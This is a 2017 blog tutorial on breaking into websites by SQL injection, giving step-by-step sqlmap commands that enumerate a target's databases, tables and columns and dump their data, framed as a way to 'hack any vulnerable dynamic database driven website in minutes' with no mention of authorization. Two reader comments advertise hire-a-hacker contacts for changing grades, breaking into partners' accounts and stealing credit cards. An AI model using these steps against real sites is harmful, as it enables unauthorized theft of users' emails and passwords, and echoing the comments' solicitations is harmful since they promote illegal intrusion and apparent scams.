Sunday, 5 February 2017

How to Hack Website using SQL Injection Attack

Posted by Vijay Jangra
Sql Injection is most common website vulnerabilities found in dynamic website. In this tutorial we will hack a website database by sql injection attack using a popular sql injection tool named SQLMap.
Most of the website in the internet today are dynamic database driven website. But this also led to some vulnerabilities in database. From these vulnerabilities, SQL Injection is most dangerous and common. The reason why I am calling this vulnerability dangerous is because every website database consists important information about website and organization like address, emails, user name, passwords.

SQL Injection is a code injection method. In other words, An attacker injects its malicious SQL Code in any field to exploit and retrieve confidential information from database. 



hack website sql injection attack

In this post, We will hack a website database using SQLMap tool in Kali Linux. Because Kali Linux is my favorite and SQLMap comes pre loaded in Kali. You can also download SQLMap tool from below link.


SQLMap is open source and available for download on github.
You need Python 2.7 to run this in windows and or in any other operating system.

You also need a SQL Injection vulnerable website for this task. I have written another post about finding vulnerable website using google.


So Lets Start Hacking(My Favorite Words) with SQLmap.

Step 1:- Open terminal and use below command to retrieve Database Information of website.

sqlmap -u http://target.com/details.php?id=

-u refers to the link of website. I am using a simple imaginary url for the sake of this tutorial. You need to replace this url with your chosen site url. There should be id= or = parameter in url of website which denotes any specific column from database.

★ Command Prompt Tips Tricks

Step 2:- After getting database information, execute this command to get list of available databases on website.
sqlmap -u http://target.com/details.php?id= --dbs

This command will give you list of Databases. 


got database list sql injection attack


Step 3:- After getting Database, its time to get Tables list.

sqlmap -u http://target.com/details.php?id= -D db_name --tables

Replace db_name with the database name of which you wants to retrieve tables.

Step 4:- Now that you got tables, You need to get columns in that table.


sqlmap -u http://target.com/details.php?id= -D db_name -T table_name --columns

Replace table_name with your desired table in database.

★ Best Ethical Hacking Tools List 2017

Step 5:- After getting columns, we are interested in getting the data available in that column.

sqlmap -u http://target.com/details.php?id= -D db_name -T table_name -C column_name --dump

Replace the column_name with the name of column in table.
--dump command is used to retrieve.

Note:- Don’t forget to replace the url in all above used command with your target website url.


And that's all. Isn’t it too easy. Using this sql injection attack you can hack any vulnerable dynamic database driven website in minutes.

★ Learn more about SQL Injection

Keep Visiting for latest hacking tutorials or Else subscribe for our blog newsletter. Share it with your newbie friends.



3 comments:

  1. That was an interesting topic. I would like to ask yu if you're serious on that? You know, that's fancy and a little illegal)

    ReplyDelete
  2. I strongly recommend secretrevealer04@gmail.com if you want to hack in to your school system to change your grades , hack money transfers, hacking into your partners phones and social network profiles, credit cards, into social networks(whatsapp, Facebook, snapchat, twitter, Instagram, e.t.c.). And also if you want to learn how to hack into the above stated earlier.

    ReplyDelete
  3. Hello,be warned, most of these so called hackers here are impostors, I know how real hackers work, they never advertise themselves in such a credulous manner and they are always discrete. I’ve been ripped off so many times out of desperation trying to find urgent help until my friend finally introduced me to a reliable hacker who works with Proof, discretion and delivers, he does all sorts of hacks but he helped me hack my cheating boyfriend email/facebook,I have made him my permanent hacker and you can as well enjoy his services. You can contact him at mitchbourne (@) cyberservices.com and after his work also endeavor to spread the good news on his work and how he helped you, Just tell him Miss Kniffen referred you.

    ReplyDelete